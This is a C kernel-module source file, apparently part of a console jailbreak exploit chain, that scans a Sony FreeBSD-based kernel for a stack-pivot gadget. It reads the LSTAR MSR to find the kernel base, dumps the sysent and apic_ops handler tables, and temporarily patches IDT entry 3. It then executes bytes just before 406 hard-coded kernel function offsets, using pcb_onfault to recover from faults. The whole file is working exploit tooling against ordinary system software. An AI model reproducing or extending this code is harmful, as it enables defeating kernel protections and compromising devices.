#include <stdint.h>

/*
 * resume_chain v10d — apic_ops + sysent gadget scanner + batch execution probe
 *
 * INT3 (CC) during LAPIC resume is BROKEN (v3, v9a both failed).
 * Alternative: find a leave;ret (C9 C3) gadget for stack pivot.
 *
 * apic_ops (28 entries) exhausted — all fn-1=C3 have fn-2=48 (REX.W).
 * Sony Clang consistently uses 48 C3 epilogues. Expanding to sysent
 * (678 entries, ~150 unique functions) for broader coverage.
 *
 * fw_ver encoding:
 *   apic_ops modes (backward-compatible):
 *     0xCC00 + idx → probe fn-3 of apic_ops[idx]
 *     0xDD00 + idx → probe fn-2 of apic_ops[idx]
 *     0xEE00 + idx → probe fn-1 of apic_ops[idx]
 *
 *   sysent fn-1 modes (pages of 256):
 *     0xAA00 + idx → sysent[idx] fn-1        (entries 0-255)
 *     0xAB00 + idx → sysent[256+idx] fn-1     (entries 256-511)
 *     0xAC00 + idx → sysent[512+idx] fn-1     (entries 512-677)
 *
 *   sysent fn-2 modes:
 *     0xBA00 + idx → sysent[idx] fn-2
 *     0xBB00 + idx → sysent[256+idx] fn-2
 *     0xBC00 + idx → sysent[512+idx] fn-2
 *
 *   sysent fn ptr dump mode (v10c):
 *     0x9900 + batch → dump sysent fn ptrs (batch 0: entries 0-283,
 *                       batch 1: entries 284-567, batch 2: entries 568-677)
 *
 *   batch execution probe mode (NEW in v10d):
 *     0x9800 + batch → probe fn-1 of 50 unique sysent handlers per batch
 *                       (406 unique offsets, 9 batches: 0-7 = 50 each, 8 = 6)
 *
 * Output layout for probe modes (64 uint64_t slots):
 *   out[0]     = MAGIC (lo32) + status (hi32)
 *   out[1]     = kdata_base
 *   out[2]     = ktext_base
 *   out[3]     = td_pcb
 *   out[4..31] = apic_ops fn ptrs (always dumped)
 *   out[32]    = step progress
 *   out[33]    = target index (real sysent idx for sysent modes)
 *   out[34]    = target fn ptr
 *   out[35]    = probe address (fn - offset)
 *   out[36]    = call result (RAX after call)
 *   out[37]    = verdict: 0=unknown, 1=changed, 2=sentinel(ret), 3=faulted
 *   out[38]    = probe offset (1=fn-1, 2=fn-2, 3=fn-3)
 *   out[39]    = source (0=apic_ops, 1=sysent)
 *   out[63]    = end marker
 *
 * Output layout for dump mode (288 uint64_t slots, 2304 bytes):
 *   out[0]     = MAGIC (lo32) + status (hi32)
 *   out[1]     = kdata_base
 *   out[2]     = ktext_base
 *   out[3]     = batch | (start_idx << 16) | (count << 32)
 *   out[4..4+count-1] = fn ptrs for sysent[start_idx..start_idx+count-1]
 *
 * Output layout for batch probe mode (288 uint64_t slots):
 *   out[0]     = MAGIC (lo32) + status (hi32): 0x010D=in-progress, 0x110D=complete
 *   out[1]     = kdata_base
 *   out[2]     = ktext_base
 *   out[3]     = batch | (start_offset_idx << 16) | (count << 32)
 *   out[4]     = td_pcb
 *   out[5]     = probes_completed (crash-safe progress counter)
 *   out[6 + i*3 + 0] = ktext offset of fn probed
 *   out[6 + i*3 + 1] = RAX result from probe_call(fn-1)
 *   out[6 + i*3 + 2] = verdict: 1=changed(CC), 2=sentinel(C3), 3=faulted
 *
 * Magic written EARLY so kldload can read partial output on crash.
 */

#define MAGIC_RSCN       0x5253434E
#define MSR_LSTAR        0xC0000082
#define LSTAR_OFFSET     0x294218
#define OFF_APIC_OPS     0x1934AC8
#define OFF_IDT          0x64cdc80
#define OFF_DORETI_IRET  (-0x9cf84c)
#define IDT_ENTRY_SIZE   16
#define APIC_OPS_COUNT   28

#define OFF_SYSENT       0x1709c0
#define SYSENT_STRIDE    0x30
#define SYSENT_FUNC_OFF  0x08
#define NUM_SYSCALLS     678

#define TD_PCB           0x3f8
#define PCB_ONFAULT      0x108

#define SENTINEL         0xBAD0BAD0BAD0BAD0ULL

/* Dump mode: 284 fn ptrs per batch (slots 4..287 of 288-slot readback) */
#define DUMP_BATCH_SIZE  284
#define READBACK_SLOTS   288

/* Batch probe mode: 50 probes per batch, 406 unique offsets */
#define BATCH_PROBE_SIZE 50
#define NUM_UNIQUE       406

/* 406 unique sysent fn ptr offsets (excluding nosys 0x2984d8) */
/* Generated by dedup_sysent.py --emit-c */
static const uint32_t unique_offsets[406] = {
    0x297180, 0x297188, 0x297198, 0x2971A0, 0x2971A8, 0x2971D0, 0x2971D8, 0x2971E0,
    0x2971F0, 0x297208, 0x297218, 0x297220, 0x297230, 0x297248, 0x297250, 0x297258,
    0x297260, 0x297278, 0x297290, 0x297298, 0x2972A0, 0x2972C8, 0x2972E0, 0x2972F8,
    0x297300, 0x297320, 0x297330, 0x297338, 0x297350, 0x297360, 0x297368, 0x297380,
    0x2973A0, 0x2973A8, 0x2973B0, 0x2973B8, 0x2973C0, 0x2973C8, 0x2973D0, 0x2973D8,
    0x2973F0, 0x2973F8, 0x297400, 0x297408, 0x297410, 0x297440, 0x297458, 0x297460,
    0x297478, 0x297480, 0x297498, 0x2974A8, 0x2974F0, 0x297500, 0x297508, 0x297518,
    0x297528, 0x297550, 0x297570, 0x297578, 0x297588, 0x297590, 0x297598, 0x2975A0,
    0x2975A8, 0x2975B0, 0x2975C8, 0x2975D0, 0x2975E0, 0x2975F0, 0x2975F8, 0x297620,
    0x297628, 0x297630, 0x297648, 0x297680, 0x297688, 0x297690, 0x2976A0, 0x2976D8,
    0x2976E8, 0x2976F0, 0x2976F8, 0x297708, 0x297718, 0x297730, 0x297790, 0x2977B8,
    0x2977C0, 0x2977C8, 0x2977D0, 0x2977E8, 0x2977F8, 0x297810, 0x297818, 0x297828,
    0x297830, 0x297838, 0x297848, 0x297850, 0x297868, 0x297880, 0x297888, 0x297898,
    0x2978A0, 0x2978A8, 0x2978C0, 0x2978E0, 0x297900, 0x297910, 0x297920, 0x297930,
    0x297938, 0x297940, 0x297950, 0x297958, 0x297960, 0x297968, 0x297978, 0x297988,
    0x297990, 0x2979A8, 0x2979B0, 0x2979F0, 0x2979F8, 0x297A00, 0x297A08, 0x297A10,
    0x297A20, 0x297A30, 0x297A40, 0x297A48, 0x297A50, 0x297A60, 0x297A80, 0x297A90,
    0x297A98, 0x297AC0, 0x297AC8, 0x297AD0, 0x297AE0, 0x297AF0, 0x297B10, 0x297B20,
    0x297B38, 0x297B78, 0x297B80, 0x297B98, 0x297BA0, 0x297BB8, 0x297BC0, 0x297BD0,
    0x297BD8, 0x297BE0, 0x297BE8, 0x297BF8, 0x297C00, 0x297C08, 0x297C10, 0x297C20,
    0x297C48, 0x297C58, 0x297C60, 0x297C68, 0x297C70, 0x297CA0, 0x297CA8, 0x297CB8,
    0x297CC8, 0x297CD0, 0x297CD8, 0x297CE0, 0x297CE8, 0x297CF0, 0x297D20, 0x297D28,
    0x297D30, 0x297D40, 0x297D58, 0x297D70, 0x297D78, 0x297D80, 0x297D88, 0x297D98,
    0x297DB0, 0x297DD8, 0x297DE0, 0x297DF0, 0x297DF8, 0x297E00, 0x297E08, 0x297E10,
    0x297E18, 0x297E30, 0x297E40, 0x297E68, 0x297E78, 0x297E90, 0x297E98, 0x297EA0,
    0x297EB0, 0x297EB8, 0x297EC0, 0x297EE8, 0x297EF0, 0x297EF8, 0x297F08, 0x297F40,
    0x297F50, 0x297F70, 0x297F78, 0x297F88, 0x297F90, 0x297F98, 0x297FA0, 0x297FA8,
    0x298000, 0x298010, 0x298020, 0x298038, 0x298040, 0x298058, 0x298060, 0x298068,
    0x298078, 0x298080, 0x298090, 0x2980A0, 0x298100, 0x298110, 0x298128, 0x298140,
    0x298150, 0x298158, 0x298168, 0x298178, 0x298180, 0x298198, 0x2981B8, 0x2981D8,
    0x2981F0, 0x298210, 0x298218, 0x298220, 0x298238, 0x298240, 0x298248, 0x298250,
    0x298260, 0x298278, 0x298280, 0x2982A0, 0x2982C0, 0x2982C8, 0x2982E0, 0x2982E8,
    0x298300, 0x298310, 0x298338, 0x298340, 0x298348, 0x298358, 0x298360, 0x298368,
    0x298378, 0x298380, 0x298390, 0x2983A0, 0x2983A8, 0x2983B8, 0x2983E0, 0x2983F0,
    0x298400, 0x298410, 0x298440, 0x298448, 0x298458, 0x298460, 0x298478, 0x298488,
    0x298498, 0x2984C8, 0x2984F0, 0x298508, 0x298510, 0x298520, 0x298530, 0x298558,
    0x298570, 0x298578, 0x298588, 0x298598, 0x2985A0, 0x2985A8, 0x2985B0, 0x2985B8,
    0x2985C8, 0x2985D0, 0x2985D8, 0x2985E0, 0x2985E8, 0x2985F8, 0x298608, 0x298628,
    0x298630, 0x298638, 0x298640, 0x298650, 0x298658, 0x298668, 0x298670, 0x298680,
    0x298688, 0x298698, 0x2986A0, 0x2986B8, 0x2986C8, 0x2986D8, 0x2986F8, 0x298700,
    0x298708, 0x298738, 0x298748, 0x298760, 0x298768, 0x298780, 0x2987B0, 0x2987C0,
    0x2987D0, 0x2987E0, 0x2987E8, 0x2987F0, 0x2987F8, 0x298810, 0x298818, 0x298850,
    0x298868, 0x298870, 0x298880, 0x298888, 0x298890, 0x2988A0, 0x2988B0, 0x2988D8,
    0x298918, 0x298920, 0x298928, 0x298930, 0x298948, 0x298950, 0x298978, 0x298980,
    0x298988, 0x298998, 0x2989A8, 0x2989C8, 0x2989D0, 0x2989E0, 0x2989E8, 0x2989F8,
    0x298A10, 0x298A28, 0x298A40, 0x298A50, 0x298A68, 0x298A88, 0x298A90, 0x298AB0,
    0x298AB8, 0x298AC0, 0x298AD0, 0x298AE0, 0x298B00, 0x298B28, 0x298B60, 0x298B68,
    0x298B78, 0x298B80, 0x298B88, 0x298B98, 0x298BA0, 0x298BA8, 0x298BB0, 0x298BB8,
    0x298BD8, 0x298BE0, 0x298BE8, 0x298C10, 0x298C18, 0x298C40, 0x298C50, 0x298C58,
    0x298C60, 0x298C70, 0x298C88, 0x298C98, 0x298CA8, 0x298CB8, 0x298CE0, 0x298CE8,
    0x298CF8, 0x298D00, 0x298D18, 0x298D20, 0x298D28, 0x298D50
};

typedef struct {
    uint64_t kdata_base;
    uint32_t fw_ver;
} kproc_args;

static inline uint64_t rdmsr(uint32_t msr)
{
    uint32_t lo, hi;
    __asm__ volatile("rdmsr" : "=a"(lo), "=d"(hi) : "c"(msr));
    return ((uint64_t)hi << 32) | lo;
}

static inline uint64_t read8(uint64_t addr)
{
    return *(volatile uint64_t *)addr;
}

static inline void write8(uint64_t addr, uint64_t val)
{
    *(volatile uint64_t *)addr = val;
}

static inline uint16_t read2(uint64_t addr)
{
    return *(volatile uint16_t *)addr;
}

static inline void write2(uint64_t addr, uint16_t val)
{
    *(volatile uint16_t *)addr = val;
}

static inline uint8_t read1(uint64_t addr)
{
    return *(volatile uint8_t *)addr;
}

static inline void write1(uint64_t addr, uint8_t val)
{
    *(volatile uint8_t *)addr = val;
}

static inline uint32_t read4(uint64_t addr)
{
    return *(volatile uint32_t *)addr;
}

static inline void write4(uint64_t addr, uint32_t val)
{
    *(volatile uint32_t *)addr = val;
}

static void idt_set_handler(uint64_t idt_entry_addr, uint64_t handler, uint8_t ist)
{
    write2(idt_entry_addr + 0, (uint16_t)(handler & 0xFFFF));
    uint8_t byte4 = read1(idt_entry_addr + 4);
    write1(idt_entry_addr + 4, (byte4 & 0xF8) | (ist & 0x07));
    write2(idt_entry_addr + 6, (uint16_t)((handler >> 16) & 0xFFFF));
    write4(idt_entry_addr + 8, (uint32_t)((handler >> 32) & 0xFFFFFFFF));
}

/*
 * Call target address with sentinel in RAX.
 * Returns RAX value after the call.
 * pcb_onfault armed for #PF recovery.
 */
static uint64_t probe_call(uint64_t target, uint64_t onfault_addr)
{
    uint64_t result;
    __asm__ volatile(
        "leaq 2f(%%rip), %%rcx\n\t"
        "movq %%rcx, (%[onfault])\n\t"

        "movabsq $0xBAD0BAD0BAD0BAD0, %%rax\n\t"
        "callq *%[target]\n\t"

        "movq %%rax, %[result]\n\t"
        "movq $0, (%[onfault])\n\t"
        "jmp 1f\n\t"

        "2:\n\t"
        "addq $8, %%rsp\n\t"  /* fix RSP: callq pushed ret addr before fault */
        "movabsq $0xFAFAFAFAFAFAFAFA, %[result]\n\t"

        "1:\n\t"
        : [result] "=&r"(result)
        : [target] "r"(target), [onfault] "r"(onfault_addr)
        : "rax", "rcx", "rdx", "rsi", "rdi",
          "r8", "r9", "r10", "r11", "memory", "cc"
    );
    return result;
}

int module_start(kproc_args *args)
{
    uint64_t kdata_base = args->kdata_base;
    uint32_t fw_ver = args->fw_ver;
    volatile uint64_t *out = (volatile uint64_t *)args;
    volatile uint32_t *out32 = (volatile uint32_t *)args;

    uint16_t mode_prefix = (fw_ver >> 8) & 0xFF;
    int target_idx = (int)(fw_ver & 0xFF);
    int probe_offset;
    int use_sysent = 0;
    int sysent_page = 0;

    /* Parse mode */
    if (mode_prefix == 0xDD) {
        probe_offset = 2;  /* apic_ops fn-2 */
    } else if (mode_prefix == 0xEE) {
        probe_offset = 1;  /* apic_ops fn-1 */
    } else if (mode_prefix == 0xCC) {
        probe_offset = 3;  /* apic_ops fn-3 */
    } else if (mode_prefix >= 0xAA && mode_prefix <= 0xAC) {
        probe_offset = 1;  /* sysent fn-1 */
        use_sysent = 1;
        sysent_page = mode_prefix - 0xAA;
    } else if (mode_prefix >= 0xBA && mode_prefix <= 0xBC) {
        probe_offset = 2;  /* sysent fn-2 */
        use_sysent = 1;
        sysent_page = mode_prefix - 0xBA;
    } else if (mode_prefix == 0x98) {
        /*
         * BATCH PROBE MODE (v10d): Execution-probe fn-1 of unique sysent handlers.
         * target_idx = batch number (0..8)
         * 50 probes per batch, 406 unique offsets total.
         */
        int batch = target_idx;
        int start = batch * BATCH_PROBE_SIZE;
        int count = BATCH_PROBE_SIZE;

        if (start >= NUM_UNIQUE) {
            for (int i = 0; i < READBACK_SLOTS; i++) out[i] = 0;
            out[1] = kdata_base;
            out[3] = batch;
            out32[1] = 0x00FE;
            __asm__ volatile("mfence" ::: "memory");
            out32[0] = MAGIC_RSCN;
            return 0;
        }

        if (start + count > NUM_UNIQUE)
            count = NUM_UNIQUE - start;

        /* Clear full readback area */
        for (int i = 0; i < READBACK_SLOTS; i++) out[i] = 0;

        uint64_t lstar = rdmsr(MSR_LSTAR);
        uint64_t ktext_base = lstar - LSTAR_OFFSET;

        out[1] = kdata_base;
        out[2] = ktext_base;
        out[3] = (uint64_t)batch | ((uint64_t)start << 16) | ((uint64_t)count << 32);
        out[5] = 0;  /* probes_completed */

        /* Write magic EARLY for crash-safe readback */
        out32[1] = 0x010D;  /* v10d in-progress */
        __asm__ volatile("mfence" ::: "memory");
        out32[0] = MAGIC_RSCN;

        /* Get curthread → td_pcb → onfault_addr */
        uint64_t curthread;
        __asm__ volatile("movq %%gs:0, %0" : "=r"(curthread));
        uint64_t td_pcb = read8(curthread + TD_PCB);
        out[4] = td_pcb;

        if (!td_pcb) {
            out32[1] = 0x00FF;
            return 0;
        }

        uint64_t onfault_addr = td_pcb + PCB_ONFAULT;

        /* Save original IDT[3] and arm doreti_iret */
        uint64_t idt_base = kdata_base + OFF_IDT;
        uint64_t idt3_addr = idt_base + 3 * IDT_ENTRY_SIZE;
        uint64_t idt3_orig_lo = read8(idt3_addr);
        uint64_t idt3_orig_hi = read8(idt3_addr + 8);

        uint64_t doreti_iret = kdata_base + (int64_t)OFF_DORETI_IRET;
        idt_set_handler(idt3_addr, doreti_iret, 0);

        /* Probe each unique fn ptr in this batch */
        for (int i = 0; i < count; i++) {
            uint32_t off = unique_offsets[start + i];
            uint64_t fn = ktext_base + off;
            uint64_t probe_addr = fn - 1;  /* fn-1 */

            uint64_t result = probe_call(probe_addr, onfault_addr);

            /* Write result triple */
            out[6 + i * 3 + 0] = off;
            out[6 + i * 3 + 1] = result;

            if (result == SENTINEL) {
                out[6 + i * 3 + 2] = 2;  /* C3/ret: sentinel unchanged */
            } else if (result == 0xFAFAFAFAFAFAFAFAULL) {
                out[6 + i * 3 + 2] = 3;  /* faulted */
            } else {
                out[6 + i * 3 + 2] = 1;  /* executed (CC or other) */
            }

            out[5] = i + 1;  /* update probes_completed (crash-safe) */
            __asm__ volatile("mfence" ::: "memory");
        }

        /* Restore original IDT[3] */
        write8(idt3_addr, idt3_orig_lo);
        write8(idt3_addr + 8, idt3_orig_hi);

        /* Mark complete */
        out32[1] = 0x110D;  /* v10d complete */
        return 0;
    } else if (mode_prefix == 0x99) {
        /*
         * DUMP MODE: Batch dump sysent fn ptrs (pure kdata reads, no execution)
         * target_idx = batch number (0, 1, or 2)
         * Batch 0: entries 0-283, Batch 1: entries 284-567, Batch 2: entries 568-677
         */
        int batch = target_idx;
        int start_idx = batch * DUMP_BATCH_SIZE;
        int count = DUMP_BATCH_SIZE;

        if (start_idx >= NUM_SYSCALLS) {
            for (int i = 0; i < READBACK_SLOTS; i++) out[i] = 0;
            out[1] = kdata_base;
            out[3] = batch;
            out32[1] = 0x00FE;
            __asm__ volatile("mfence" ::: "memory");
            out32[0] = MAGIC_RSCN;
            return 0;
        }

        if (start_idx + count > NUM_SYSCALLS)
            count = NUM_SYSCALLS - start_idx;

        /* Clear full readback area */
        for (int i = 0; i < READBACK_SLOTS; i++) out[i] = 0;

        uint64_t lstar = rdmsr(MSR_LSTAR);
        uint64_t ktext_base = lstar - LSTAR_OFFSET;
        uint64_t sysent_base = kdata_base + OFF_SYSENT;

        out[1] = kdata_base;
        out[2] = ktext_base;
        out[3] = (uint64_t)batch | ((uint64_t)start_idx << 16) | ((uint64_t)count << 32);

        /* Dump fn ptrs */
        for (int i = 0; i < count; i++) {
            uint64_t fn = read8(sysent_base + (uint64_t)(start_idx + i) * SYSENT_STRIDE + SYSENT_FUNC_OFF);
            out[4 + i] = fn;
        }

        /* Write magic LAST with mfence (all data committed before magic) */
        out32[1] = 0x110C;  /* v10c dump complete */
        __asm__ volatile("mfence" ::: "memory");
        out32[0] = MAGIC_RSCN;
        return 0;
    } else {
        /* Unknown mode */
        for (int i = 0; i < 64; i++) out[i] = 0;
        out[1] = kdata_base;
        out[3] = fw_ver;
        out32[1] = 0x00FD;
        __asm__ volatile("mfence" ::: "memory");
        out32[0] = MAGIC_RSCN;
        return 0;
    }

    /* Clear output buffer */
    for (int i = 0; i < 64; i++)
        out[i] = 0;

    uint64_t lstar = rdmsr(MSR_LSTAR);
    uint64_t ktext_base = lstar - LSTAR_OFFSET;

    out[1] = kdata_base;
    out[2] = ktext_base;

    /* Write magic EARLY for crash-safe readback */
    out[38] = probe_offset;
    out[39] = use_sysent;
    out32[1] = 0x010B;  /* v10b in-progress */
    __asm__ volatile("mfence" ::: "memory");
    out32[0] = MAGIC_RSCN;

    out[32] = 0x01;  /* step: starting */

    /* Get curthread → td_pcb → onfault_addr */
    uint64_t curthread;
    __asm__ volatile("movq %%gs:0, %0" : "=r"(curthread));
    uint64_t td_pcb = read8(curthread + TD_PCB);
    out[3] = td_pcb;

    if (!td_pcb) {
        out32[1] = 0x00FF;
        return 0;
    }

    uint64_t onfault_addr = td_pcb + PCB_ONFAULT;

    /* Always dump apic_ops fn ptrs (for reference) */
    uint64_t apic_ops_addr = ktext_base + OFF_APIC_OPS;
    for (int i = 0; i < APIC_OPS_COUNT; i++)
        out[4 + i] = read8(apic_ops_addr + i * 8);

    out[32] = 0x02;  /* step: fn ptrs read */

    /* Resolve target fn ptr */
    uint64_t fn = 0;

    if (use_sysent) {
        int real_idx = sysent_page * 256 + target_idx;

        if (real_idx >= NUM_SYSCALLS) {
            out[33] = real_idx;
            out32[1] = 0x00FE;
            return 0;
        }

        uint64_t sysent_base = kdata_base + OFF_SYSENT;
        fn = read8(sysent_base + (uint64_t)real_idx * SYSENT_STRIDE + SYSENT_FUNC_OFF);
        out[33] = real_idx;
        out[34] = fn;

        /* Validate fn is in ktext range */
        if (fn < ktext_base || fn >= ktext_base + 0xC00000) {
            out[35] = 0;
            out[37] = 0;
            out32[1] = 0x01F1;  /* fn outside ktext */
            return 0;
        }
    } else {
        /* apic_ops mode */
        if (target_idx >= APIC_OPS_COUNT) {
            out[33] = target_idx;
            out32[1] = 0x00FE;
            return 0;
        }

        fn = out[4 + target_idx];
        out[33] = target_idx;
        out[34] = fn;
    }

    if (fn == 0) {
        out[35] = 0;
        out[37] = 0;
        out32[1] = 0x01F0;
        return 0;
    }

    uint64_t probe_addr = fn - probe_offset;
    out[35] = probe_addr;

    /* Save original IDT[3] (16 bytes) */
    uint64_t idt_base = kdata_base + OFF_IDT;
    uint64_t idt3_addr = idt_base + 3 * IDT_ENTRY_SIZE;
    uint64_t idt3_orig_lo = read8(idt3_addr);
    uint64_t idt3_orig_hi = read8(idt3_addr + 8);

    /* Set IDT[3] = doreti_iret, IST=0 (catches INT3 if probe hits CC) */
    uint64_t doreti_iret = kdata_base + (int64_t)OFF_DORETI_IRET;
    idt_set_handler(idt3_addr, doreti_iret, 0);

    out[32] = 0x03;  /* step: IDT[3] armed */

    /* === SINGLE PROBE === */
    out[32] = 0x100 + (use_sysent ? (sysent_page * 256 + target_idx) : target_idx);

    uint64_t result = probe_call(probe_addr, onfault_addr);
    out[36] = result;

    /* Classify result */
    if (result == SENTINEL) {
        out[37] = 2;  /* sentinel unchanged: ret/NOP+ret/REX+ret */
    } else if (result == 0xFAFAFAFAFAFAFAFAULL) {
        out[37] = 3;  /* faulted (#PF caught by pcb_onfault) */
    } else {
        out[37] = 1;  /* RAX changed: function executed */
    }

    /* Restore original IDT[3] */
    write8(idt3_addr, idt3_orig_lo);
    write8(idt3_addr + 8, idt3_orig_hi);

    out[32] = 0x04;  /* step: complete */

    out[63] = 0xdeadbeefcafe010BULL;

    /* Update magic with completion status */
    out32[1] = 0x110B;  /* v10b complete */

    return 0;
}
